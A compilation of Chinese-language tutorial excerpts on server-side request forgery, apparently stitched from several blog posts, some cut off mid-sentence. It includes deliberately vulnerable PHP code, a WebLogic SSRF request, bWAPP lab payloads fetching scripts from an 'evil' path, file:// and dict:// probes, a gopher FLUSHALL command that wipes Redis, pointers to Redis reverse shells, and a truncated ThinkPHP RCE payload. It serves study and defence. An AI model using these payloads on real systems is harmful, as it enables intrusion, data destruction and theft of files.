ssrf

漏洞产生原因： 是指Web服务提供从用户指定的URL读取数据并展示功能又未 对用户输入的URL进行过滤，导致攻击者可借助服务端实现访问其本无权访问的URL。 攻击者无权访问的URL主要是内网，而对于不是Web服务的其他端口反回的一般是端口对应的服务的banner信息， 所以SSRF的一大利用是探测内网端口开放信息。（所以SSRF归类为信息泄漏类型） 漏洞利用： 1.1、直接访问： http://ip:7001/uddiexplorer/ ,SSRF漏洞存在于： http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp 1.2、向服务器提交以下参数： ?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 1.3、当我们访问一个存在的端口时，比如： http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business

梳理一下ssrf 不详细 简单记录 0x01 SSRF成因和基本利用 0x02 内网打未授权redis 0x03 关于ssrf打授权的redis 0x04 写redis shell和密钥的一点问题 0x05 SSRF Bypass 0x06 SSRFmap last 0x01 SSRF成因和基本利用 php vul function: file_get_contents () fsockopen () curl_exec() readfile() example: <? php function curl( $url ){ $ch = curl_init(); curl_setopt( $ch , CURLOPT_URL, $url ); curl_setopt( $ch , CURLOPT_HEADER, 0 ); curl_exec( $ch ); curl_close( $ch ); } $url = $_GET ['url' ]; curl( $url ); ?> <? php function Getfile( $host , $port , $link ){ $fp = fsockopen ( $host , intval ( $port ), $errno , $errstr , 30 ); if (! $fp ){ echo " $errstr (error

一、攻击原理 SSRF：服务端请求伪造，不要把它和CSRF（跨站点请求伪造）攻击搞混了哦，CSRF利用的是客户端请求，而SSRF利用的是服务器端请求，这个是本质区别。 简单来说，SSRF攻击原理是服务器端请求了来自客户端构造的链接，这个是不是和CSRF攻击类似呢，攻击者构造的请求由客户端用户执行了，没错，都是由攻击者构造了请求，不过一个是用户浏览器端执行，一个是服务器端执行。 但这其中的原理不是相同的哦：CSRF攻击利用的是浏览器请求会自动附带该站点的用户身份标识，而SSRF攻击和用户身份标识没有半毛钱关系，通过SSRF攻击，我们可以指定服务器访问某些链接，那么问题来了，我们可以控制服务器访问某些链接，可以达到什么目的呢？ 1、进行端口探测：我们知道，可以通过HTTP加端口号来探测指定服务器端口是否开放。如http://127.0.0.1:80，那么就可以利用SSRF进行端口扫描了，有些服务还会返回banner信息，如ssh、FTP等，那么就可以完成内网端口探测了。 2、读取任意文件：如果服务器支持file协议，还可以通过file协议读取任意文件。 3、其它利用，基于HTTP-GET请求攻击，如溢出、sql注入等等，一般是无法外网直接访问，由服务器端发起攻击。 二、SSRF攻击演示 既然知道了SSRF攻击是由于服务器端执行了来自客户端的发起请求

SSRF的3个小实验 bWAPP中的SSRF给出了3个小实验来说明SSRF的利用场景: 任务1：使用远程文件包含进行端口扫描（内网探测） 任务2：使用XXE获取敏感文件中的内容（文件读取） 任务3：使用XXE进行SmartTV的拒绝服务漏洞的利用（漏洞利用） 任务1：使用远程文件包含进行端口扫描 点击任务1中的Port scan可以获得一份端口扫描的攻击脚本： http://192.168.163.157/evil/ssrf-1.txt 接下来就是利用bWAPP中的远程文件包含漏洞，执行端口扫描的脚本。 在Choose your bug中选择Remote & Local File Inclusion (RFI/LFI)security level选择low，然后点击Hack。 观察Get请求中的参数，发现是典型文件包含问题，language=lang_en.php payload:?language=http://xxx.xxx.xxx/evil/ssrf-1.txt&action=go POST：ip=xxxx 任务2：使用XXE获取敏感文件中的内容 点击Access获取XXE的利用脚本:10.158.131.81/bWAPP_latest/evil/ssrf-2.txt 然后切换到XXE漏洞利用环境，点击 Anybugs？ ,抓包 将选中模块更改为下面的XML代码： <?xml

SSRF的成因看具体的后端实现TCP请求的库： 比如curl、php里的file_get_contents、fsockopen、Java里的openStream，HttpClient类，URLConnection等 https://drops.org.cn/PENETRATION/SSRF-Gopher-Attack-NoteBook.html 发起请求的库不同，决定了可以发起什么样类型的请求。 利用gopher发起任意TCP请求（依赖curl） gopher://127.0.0.1:70/_ + TCP/IP数据 默认是70端口，可以指定为其他端口 可以攻击Redis、抓包改包之后可以攻击mysql。 利用GoPher协议进行内网Redis和mysql的未授权操作（在服务端设置了未授权访问的情况下） SSRF可以结合DNS重绑定 http://www.bendawang.site/2017/05/31/%E5%85%B3%E4%BA%8EDNS-rebinding%E7%9A%84%E6%80%BB%E7%BB%93/ 对Redis进行DoS： curl -v gopher://127.0.0.1:6379/_FLUSHALL --max-time 1 通过向Redis持续发送flushall命令，让它不能存储数据。 利用Gopher进行SSRF的局限性以及利用方式：

SSRF 什么是SSRF 利用方法 进阶 防御 检测请求url流程 什么是SSRF SSRF(Server-Side Request Forgery)，服务器端请求伪造，利用漏洞伪造服务器端发起请求，从而突破客户端获取不到数据限制。 利用方法 进阶 ssrf绕过技巧 file协议的运用 gopher协议的运用 dict协议应用 防御 代码防御（严格按照公司的内部代码规范进行代码的编写） 检测请求url流程 解析目标url，获取其host 解析host，获取host指向的ip地址 检查ip地址是否为合法ip 请求url 如果有跳转，取出跳转url，重复执行步骤a 来源： CSDN 作者： sh0rk 链接： https://blog.csdn.net/Home_pig/article/details/84422168

SSRF攻击原理 什么是SSRF？ 服务器端请求伪造（SSRF）是指攻击者能够从易受攻击的Web应用程序发送精心设计的请求的对其他网站进行攻击。(利用一个可发起网络请求的服务当作跳板来攻击其他服务) 简单理解就是： 攻击者能够利用目标帮助攻击者访问其他想要攻击的目标 A让B帮忙访问C 为什么会产生SSRF漏洞？ 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL，web应用可以获取图片，下载文件，读取文件内容等。且没有对目标地址做过滤与限制，就产生了SSRF 这个功能如果被恶意使用，可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。这种形式的攻击称为服务端请求伪造攻击，简称SSRF，例子如下，百度识图 再举个形象的例子，网页翻译，提供了让我们输入url的接口，然后系统去访问，这里是做过防护的，如果没有防护，我们就可以直通内网，如下图 乌云学习文章： http://www.anquan.us/static/bugs/wooyun-2016-0198176.html SSRF的利用场景 1 首先了解到的是存在SSRF漏洞的服务器，可以当成我们的一个跳板，去测试其他服务器 2 如果一个公司内网外网不是物理隔离，可以通过这台服务器进行内网探测存活主机及端口，这应该属与信息搜集 3 可以对内网Web应用进行指纹识别，原理是通过请求默认的文件得到特定的指纹

文章目录 一、基础知识的学习 (1) cURL (2) PHP的curl函数 (3) gopher协议 3.1 用gopher协议get传数据 3.2 用gopher协议post传数据 3.3 在ssrf中使用gopher协议 (4) file协议和dict协议 一、基础知识的学习 (1) cURL cURL是一个利用URL语法在命令行下工作的文件传输工具。它支持文件上传和下载，所以是综合传输工具。cURL还包含了用于程序开发的libcurl。 cURL支持的通信协议有 ：FTP、FTPS、HTTP、HTTPS、 Gopher 、SCP、Telnet、DICT、FILE、LDAP、LDAPS、IMAP、POP3、SMTP和RTSP。curl还支持SSL认证、HTTP POST、HTTP PUT、FTP。 curl protocol://address:port/url?args (2) PHP的curl函数 菜鸟教程 PHP支持libcurl库与各种的服务器使用各种类型的协议进行连接和通讯。 几个相关函数 curl_init() 初始化一个cURL会话。 初始化一个新的会话，返回一个cURL句柄，供curl_setopt(), curl_exec()和curl_close() 函数使用 curl_setopt() 设置一个cURL传输选项。 curl_setopt ( $ch ,

SSRF漏洞如何产生 SSRF（Server-Side Request Forgery:服务器端请求伪造）是一种由攻击 者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF是 能够直接对目标网站的内部系统发起请求。(因为他是从内部系统访 问的，所以可以通过它攻击外网无法访问的内部系统，也就是把目标 网站当中间人) gopher协议的利用 gopher 协议 Gopher是Internet.上一个很有名的信息查找系统，它将Internet.上的文件组织成某种索引，很方便用户获取。Gopher协议使得Internet上的所有Gopher客户程序能够与已注册的Gopher服务器对话。简单来说，在WWW出现之前，Gopher 是Internet.上最主要的检索工具。大家在学习认识的时候可以将其当做一个个等价于访问网页的正常请求方式 它的使用格式是gopher://URL。 在SSRF中经常会使用Gopher来构造GET/POST包攻击应用。 tp框架漏洞 这个漏洞是5.0.22版本的一个很著名的漏洞。 :对于一般的系统来说，没有补上的话，就会被攻击者构造get进行rce. 这是已经公开的payload http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_

代码 //index.php <?php $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $_GET['url']); #curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HEADER, 0); #curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS); curl_exec($ch); curl_close($ch); ?> file #读取本地的文件 http://127.0.0.1/?url=file:///d://2.txt dict #探测不向外网开放的端口 http://127.0.0.1/?url=dict://123.57.62.22:80 gopher gopher有特定的协议格式，构造比较麻烦，直接用https://github.com/tarunkant/Gopherus来构造包 介绍原理的文章:https://joychou.org/web/phpssrf.html Redis root权限下利用crontab反弹shell，ssh免密码登陆 低权限写入网站木马 以上两种都是利用了redis写文件的原理 ① 构造gopher协议包